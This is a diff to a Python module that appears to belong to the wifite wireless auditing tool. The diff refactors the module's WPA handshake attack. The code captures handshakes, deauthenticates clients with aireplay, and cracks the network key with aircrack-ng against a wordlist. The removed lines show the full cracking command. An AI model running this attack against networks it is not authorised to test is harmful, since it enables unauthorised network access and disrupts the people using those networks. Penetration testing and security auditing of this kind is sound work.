@@ -1,7 +1,8 @@
-#!/usr/bin/python2.7
+#!/usr/bin/env python
 # -*- coding: utf-8 -*-
 
 from ..model.attack import Attack
+from ..tools.aircrack import Aircrack
 from ..tools.airodump import Airodump
 from ..tools.aireplay import Aireplay
 from ..config import Configuration
@@ -24,21 +25,19 @@ class AttackWPA(Attack):
         self.success = False
 
     def run(self):
-        '''
-            Initiates full WPA hanshake capture attack.
-        '''
+        '''Initiates full WPA handshake capture attack.'''
 
-        # Check if user only wants to run PixieDust attack
+        if Configuration.use_pmkid_only:
+            self.success = False
+            return False
+        # Skip if user only wants to run PixieDust attack
         if Configuration.wps_only and self.target.wps:
-            Color.pl('\r{!} {O}--wps-only{R} set, ignoring WPA-handshake attack on {O}%s{W}' % self.target.essid)
+            Color.pl('\r{!} {O}Skipping WPA-Handshake attack on {R}%s{O} because {R}--wps-only{O} is set{W}' % self.target.essid)
             self.success = False
             return self.success
 
-        handshake = None
-
-        # Capture the handshake ("do it live!")
-        if handshake is None:
-            handshake = self.capture_handshake()
+        # Capture the handshake (or use an old one)
+        handshake = self.capture_handshake()
 
         if handshake is None:
             # Failed to capture handshake
@@ -49,18 +48,37 @@ class AttackWPA(Attack):
         Color.pl('\n{+} analysis of captured handshake file:')
         handshake.analyze()
 
+        # Check wordlist
+        if Configuration.wordlist is None:
+            Color.pl('{!} {O}Not cracking handshake because' +
+                     ' wordlist ({R}--dict{O}) is not set')
+            self.success = False
+            return False
+
+        elif not os.path.exists(Configuration.wordlist):
+            Color.pl('{!} {O}Not cracking handshake because' +
+                     ' wordlist {R}%s{O} was not found' % Configuration.wordlist)
+            self.success = False
+            return False
+
+        Color.pl('\n{+} {C}Cracking WPA Handshake:{W} Running {C}aircrack-ng{W} with' +
+                ' {C}%s{W} wordlist' % os.path.split(Configuration.wordlist)[-1])
+
         # Crack it
-        key = self.crack_handshake(handshake, Configuration.wordlist)
+        key = Aircrack.crack_handshake(handshake, show_command=False)
         if key is None:
+            Color.pl('{!} {R}Failed to crack handshake: {O}%s{R} did not contain password{W}' % Configuration.wordlist.split(os.sep)[-1])
             self.success = False
         else:
+            Color.pl('{+} {G}Cracked WPA Handshake{W} PSK: {G}%s{W}\n' % key)
             self.crack_result = CrackResultWPA(handshake.bssid, handshake.essid, handshake.capfile, key)
             self.crack_result.dump()
             self.success = True
         return self.success
 
+
     def capture_handshake(self):
-        ''' Returns captured or stored handshake, otherwise None '''
+        '''Returns captured or stored handshake, otherwise None.'''
         handshake = None
 
         # First, start Airodump process
@@ -70,7 +88,7 @@ class AttackWPA(Attack):
                       output_file_prefix='wpa') as airodump:
 
             Color.clear_entire_line()
-            Color.pattack("WPA", self.target, "Handshake capture", "Waiting for target to appear...")
+            Color.pattack('WPA', self.target, 'Handshake capture', 'Waiting for target to appear...')
             airodump_target = self.wait_for_target(airodump)
 
             self.clients = []
@@ -81,7 +99,7 @@ class AttackWPA(Attack):
                 essid = airodump_target.essid if airodump_target.essid_known else None
                 handshake = self.load_handshake(bssid=bssid, essid=essid)
                 if handshake:
-                    Color.pattack("WPA", self.target, "Handshake capture", "found {G}existing handshake{W} for {C}%s{W}" % handshake.essid)
+                    Color.pattack('WPA', self.target, 'Handshake capture', 'found {G}existing handshake{W} for {C}%s{W}' % handshake.essid)
                     Color.pl('\n{+} Using handshake from {C}%s{W}' % handshake.capfile)
                     return handshake
 
@@ -91,10 +109,10 @@ class AttackWPA(Attack):
             while handshake is None and not timeout_timer.ended():
                 step_timer = Timer(1)
                 Color.clear_entire_line()
-                Color.pattack("WPA",
+                Color.pattack('WPA',
                         airodump_target,
-                        "Handshake capture",
-                        "Listening. (clients:{G}%d{W}, deauth:{O}%s{W}, timeout:{R}%s{W})" % (len(self.clients), deauth_timer, timeout_timer))
+                        'Handshake capture',
+                        'Listening. (clients:{G}%d{W}, deauth:{O}%s{W}, timeout:{R}%s{W})' % (len(self.clients), deauth_timer, timeout_timer))
 
                 # Find .cap file
                 cap_files = airodump.find_files(endswith='.cap')
@@ -114,7 +132,12 @@ class AttackWPA(Attack):
                 handshake = Handshake(temp_file, bssid=bssid, essid=essid)
                 if handshake.has_handshake():
                     # We got a handshake
-                    Color.pl('\n\n{+} {G}successfully captured handshake{W}')
+                    Color.clear_entire_line()
+                    Color.pattack('WPA',
+                            airodump_target,
+                            'Handshake capture',
+                            '{G}Captured handshake{W}')
+                    Color.pl('')
                     break
 
                 # There is no handshake
@@ -127,11 +150,11 @@ class AttackWPA(Attack):
                 for client in airodump_target.clients:
                     if client.station not in self.clients:
                         Color.clear_entire_line()
-                        Color.pattack("WPA",
+                        Color.pattack('WPA',
                                 airodump_target,
-                                "Handshake capture",
-                                "Discovered new client: {G}%s{W}" % client.station)
-                        Color.pl("")
+                                'Handshake capture',
+                                'Discovered new client: {G}%s{W}' % client.station)
+                        Color.pl('')
                         self.clients.append(client.station)
 
                 # Send deauth to a client or broadcast
@@ -146,83 +169,13 @@ class AttackWPA(Attack):
 
         if handshake is None:
             # No handshake, attack failed.
-            Color.pl("\n{!} {O}WPA handshake capture {R}FAILED:{O} Timed out after %d seconds" % (Configuration.wpa_attack_timeout))
+            Color.pl('\n{!} {O}WPA handshake capture {R}FAILED:{O} Timed out after %d seconds' % (Configuration.wpa_attack_timeout))
             return handshake
         else:
             # Save copy of handshake to ./hs/
             self.save_handshake(handshake)
             return handshake
 
-    def crack_handshake(self, handshake, wordlist):
-        '''Tries to crack a handshake. Returns WPA key if found, otherwise None.'''
-        if wordlist is None:
-            Color.pl("{!} {O}Not cracking handshake because" +
-                     " wordlist ({R}--dict{O}) is not set")
-            return None
-        elif not os.path.exists(wordlist):
-            Color.pl("{!} {O}Not cracking handshake because" +
-                     " wordlist {R}%s{O} was not found" % wordlist)
-            return None
-
-        Color.pl("\n{+} {C}Cracking WPA Handshake:{W} Using {C}aircrack-ng{W} via" +
-                " {C}%s{W} wordlist" % os.path.split(wordlist)[-1])
-
-        key_file = Configuration.temp('wpakey.txt')
-        command = [
-            "aircrack-ng",
-            "-a", "2",
-            "-w", wordlist,
-            "--bssid", handshake.bssid,
-            "-l", key_file,
-            handshake.capfile
-        ]
-        crack_proc = Process(command)
-
-        # Report progress of cracking
-        aircrack_nums_re = re.compile(r"(\d+)/(\d+) keys tested.*\(([\d.]+)\s+k/s")
-        aircrack_key_re  = re.compile(r"Current passphrase:\s*([^\s].*[^\s])\s*$")
-        num_tried = num_total = 0
-        percent = num_kps = 0.0
-        eta_str = "unknown"
-        current_key = ''
-        while crack_proc.poll() is None:
-            line = crack_proc.pid.stdout.readline()
-            match_nums = aircrack_nums_re.search(line)
-            match_keys = aircrack_key_re.search(line)
-            if match_nums:
-                num_tried = int(match_nums.group(1))
-                num_total = int(match_nums.group(2))
-                num_kps = float(match_nums.group(3))
-                eta_seconds = (num_total - num_tried) / num_kps
-                eta_str = Timer.secs_to_str(eta_seconds)
-                percent = 100.0 * float(num_tried) / float(num_total)
-            elif match_keys:
-                current_key = match_keys.group(1)
-            else:
-                continue
-
-            status = "\r{+} {C}Cracking WPA Handshake: %0.2f%%{W}" % percent
-            status += " ETA: {C}%s{W}" % eta_str
-            status += " @ {C}%0.1fkps{W}" % num_kps
-            #status += " ({C}%d{W}/{C}%d{W} keys)" % (num_tried, num_total)
-            status += " (current key: {C}%s{W})" % current_key
-            Color.clear_entire_line()
-            Color.p(status)
-
-        Color.pl("")
-        # Check crack result
-        if os.path.exists(key_file):
-            with open(key_file, "r") as fid:
-                key = fid.read().strip()
-            os.remove(key_file)
-
-            Color.pl("{+} {G}Cracked WPA Handshake{W} PSK: {G}%s{W}\n" % key)
-            return key
-        else:
-            Color.pl("{!} {R}Failed to crack handshake:" +
-                     " {O}%s{R} did not contain password{W}" % wordlist.split(os.sep)[-1])
-            return None
-
     def load_handshake(self, bssid, essid):
         if not os.path.exists(Configuration.wpa_handshake_dir):
             return None
@@ -253,14 +206,17 @@ class AttackWPA(Attack):
             os.mkdir(Configuration.wpa_handshake_dir)
 
         # Generate filesystem-safe filename from bssid, essid and date
-        essid_safe = re.sub('[^a-zA-Z0-9]', '', handshake.essid)
+        if handshake.essid and type(handshake.essid) is str:
+            essid_safe = re.sub('[^a-zA-Z0-9]', '', handshake.essid)
+        else:
+            essid_safe = 'UnknownEssid'
         bssid_safe = handshake.bssid.replace(':', '-')
         date = time.strftime('%Y-%m-%dT%H-%M-%S')
         cap_filename = 'handshake_%s_%s_%s.cap' % (essid_safe, bssid_safe, date)
         cap_filename = os.path.join(Configuration.wpa_handshake_dir, cap_filename)
 
         if Configuration.wpa_strip_handshake:
-            Color.p("{+} {C}stripping{W} non-handshake packets, saving to {G}%s{W}..." % cap_filename)
+            Color.p('{+} {C}stripping{W} non-handshake packets, saving to {G}%s{W}...' % cap_filename)
             handshake.strip(outfile=cap_filename)
             Color.pl('{G}saved{W}')
         else:
@@ -282,25 +238,25 @@ class AttackWPA(Attack):
 
         for index, client in enumerate([None] + self.clients):
             if client is None:
-                target_name = "*broadcast*"
+                target_name = '*broadcast*'
             else:
                 target_name = client
             Color.clear_entire_line()
-            Color.pattack("WPA",
+            Color.pattack('WPA',
                     target,
-                    "Handshake capture",
-                    "Deauthing {O}%s{W}" % target_name)
+                    'Handshake capture',
+                    'Deauthing {O}%s{W}' % target_name)
             Aireplay.deauth(target.bssid, client_mac=client, timeout=2)
 
 if __name__ == '__main__':
     Configuration.initialize(True)
     from ..model.target import Target
-    fields = "A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46,  11,  54e,WPA, WPA, , -58,        2,        0,   0.  0.  0.  0,   9, Test Router Please Ignore, ".split(',')
+    fields = 'A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46,  11,  54e,WPA, WPA, , -58,        2,        0,   0.  0.  0.  0,   9, Test Router Please Ignore, '.split(',')
     target = Target(fields)
     wpa = AttackWPA(target)
     try:
         wpa.run()
     except KeyboardInterrupt:
-        Color.pl("")
+        Color.pl('')
         pass
     Configuration.exit_gracefully(0)
